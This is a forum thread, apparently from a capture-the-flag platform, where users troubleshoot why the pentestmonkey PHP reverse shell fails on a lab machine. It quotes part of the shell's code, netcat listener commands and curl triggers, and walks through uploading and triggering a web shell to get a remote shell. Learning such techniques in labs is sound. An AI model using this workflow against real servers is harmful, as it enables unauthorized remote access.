php-reverse-shell.php issue

Type your comment> @Phase said:

I had this same issue. It means your pc isn’t listening on the port.

You want to issue this command on your machine

nc -lnvp ‘whatever port you set in reverse shell’

e.g. nc -lnvp 1234

That’s not what it means. Assuming you’re using the most common script…

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
	// Fork and have the parent process exit
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}
	// Make the current process a session leader
	// Will only succeed if we forked
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}
	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

Additionally from the Pentestmonkey website…

“Isn’t the shell connection just going to be severed when the web server times out the PHP script?
No. It doesn’t seem to on the systems that I’ve tested it on (Gentoo Linux only so far). Additionally the PHP script attempts to daemonise itself and dissociate from the parent process to avoid this (though it rarely works in practise). Your browser will appear to hang when you access the reverse shell. This is normal. It’s OK to hit cancel in your browser once you’ve got your shell.”

But the shell doesn’t appear.

I have this exact problem, its with a retired machine-I even then followed along with the write-up. They were doing exactly what I was doing. Need to fix whatever my problem is, this is very important to me.

figured out what i was doing, using kali to server the php page i was wget’n only an error message. so that was all i saw. lol. it was a learning moment.

Type your comment

Late to the party, but I’m running into this exact same issue and unfortunately I don’t think anyone explained how they resolved the issue in the comments above. Would someone care to please help me out?

Was also running into this. Check your firewall settings and make sure your kali box is able to accept the port you are using in the php file.

if using ufw you can run this command:

ufw allow from 10.10.10.28 proto tcp to any port 1234

replace the ip and port based on your use case

@Blackxbeard said:
Was also running into this. Check your firewall settings and make sure your kali box is able to accept the port you are using in the php file.

if using ufw you can run this command:

ufw allow from 10.10.10.28 proto tcp to any port 1234

replace the ip and port based on your use case

Did this (changed “port 1234” to “port 80” since I think that’s the one I need), but alas, no luck.

For reference, here is the error message I get:

curl http://10.10.10.28/uploads/php-reverse-shell.php
WARNING: Failed to daemonise. This is quite common and not fatal.
Successfully opened reverse shell to 10.10.10.28:80
ERROR: Shell connection terminated

Have you tried generating a PHP reverse shell with msfvenom instead? That works too.
Not sure which this box is, but I got the same error when I used pentestmonkey’s reverse shell found in /usr/share/webshells/php/. This was for a Windows box.

WARNING: Failed to daemonise. This is quite common and not fatal.
Successfully opened reverse shell to 10.10.10.28:80
ERROR: Shell connection terminated

@ivanitlearning said:
Have you tried generating a PHP reverse shell with msfvenom instead? That works too.
Not sure which this box is, but I got the same error when I used pentestmonkey’s reverse shell found in /usr/share/webshells/php/. This was for a Windows box.

WARNING: Failed to daemonise. This is quite common and not fatal.
Successfully opened reverse shell to 10.10.10.28:80
ERROR: Shell connection terminated

No luck there either. Every exploit I tried, nothing happened and then when I exited it would say “exploit successful. No session created”

Hello Everyone,

I got the same problems I tried to go through everything and I made it in the end :smiley: , so this will help you troubelshoot the issue and try everything :

  1. Before uploading php-reverse-shell.php to the targe, first of all modify the IP address and put the one that was assigned to you through your connection to the Hackthebox network it start with 10.10.14. and you can find it using either “ifconfig” or "ip a " command. About the port number you can change the port or leave it as it is, i.e. “1234”, but for best practice let’s change it and to “33456” instead

  2. Now you modified the file, you uploaded to the web server and you got that message on the web broser that your file is uploaded. CONGRATS !! here’s the critical part :

  3. first of all run the nc command “nc -lvnp 33456” and before run it check that the firewall is disabled using the command “ufw status”

  4. Now you’re listening on the port 33456 and you’re waiting for the machine to reverse connect you , you invoke the event by running the curl command (make sure that your filename is right)

  5. normally in this case you should see on the terminal where you executed the “nc” command that you get a little $ to run your command and that the connection is established

There’s something I still not understand, i.e. : if I stay inactive in the connection I established the connection on the port closes (which is normal) but when I try to execute the curl command I got a 404 which specify that the file is removed so I need to go through the process again and upload the file and… , I think that when the php script is terminated it deletes itself automatically which is a good cybersecurity best practice to not leave a print in the attacked machine.

Best Regards,
Salah,

Check whether you are entering the correct IP address it must be the tun0 interface and try listening via nc -lvvp 1234

2 Likes

@SalahEo said:
There’s something I still not understand, i.e. : if I stay inactive in the connection I established the connection on the port closes (which is normal) but when I try to execute the curl command I got a 404 which specify that the file is removed so I need to go through the process again and upload the file and… , I think that when the php script is terminated it deletes itself automatically which is a good cybersecurity best practice to not leave a print in the attacked machine.

Tip for your next machines: when uploading files that keep getting deleted, if you’re using Burp Proxy you can send the upload request from Proxy > HTTP history to Repeater and resend it to upload the same file again without modifying any cookies or data.

1 Like

Sorry, I never explained the mistake I was making. It is embarrassing, but it may help someone. Keep in mind I was a total noob, I mean my noobness was extreme, not as bad now… But to the problem I was making for myself… How are you getting your shell to your box? Are you serving it? Like does that server speak php? If so you are only going to upload error messages-- not a shell. So turn apache2 off on your haxor box, and use

python3 -m http.server port
sudo python3 -m http.server low port

I hope this helps someone, it was my first real big problem and was very discouraging.
I apologize for stealing that moment when you figured out your problem if that is indeed what just happened.

Just in case anyone else is facing the same problem, point the reverse shell to your HTB IP address located at the tun0 interface and not your WIFI interface.

1 Like

Heya, i am facing the same issue.
-My tun0 interface ip is 10.10.14.23
-no firewall is up at machine or network level
-no port redirection for 8443
-my vpn is up and running (i can ping and access the oopsie machine)
-i have successfully uploaded a reverseshell.php and set up the ip 10.10.14.23 ip, and port 8443
-i am listening to port 8443
nc -lvnp 8443
listening on [any] 8443 …

-and when i execute the shell i got
[~/HTB/Oopsie]
└─$ curl http://10.10.10.28/uploads/reverseshelltest.php
WARNING: Failed to daemonise. This is quite common and not fatal.
Connection refused (111)

I am really trying to see what is causing this , no more hint so far :frowning:

PS: btw, for those who get a 404 error the files are deleted every X minutes so you should upload it again

Hello,

You probable use a server that has a php module. When you call your script it executes on your server. That’s why it does not work. To fix this issue you have to delete extension of a php file, than transfers it to the victim machine and add the .php extension after. Normally it should work.

Just a quick follow up: this was due to the the duration of the vpn tunnel somehow, it had been running al night , i have closed it. regenerate the access pack and got the same workflow running at the same time. Not sure exactly what (a time out? a token? …) but at least i was able to complete it!

Type your comment> @Vetka said:

Hello,

You probable use a server that has a php module. When you call your script it executes on your server. That’s why it does not work. To fix this issue you have to delete extension of a php file, than transfers it to the victim machine and add the .php extension after. Normally it should work.

How would you do that? I have the same problem?

Did you check the local firewall is running? I stop this and found webshell.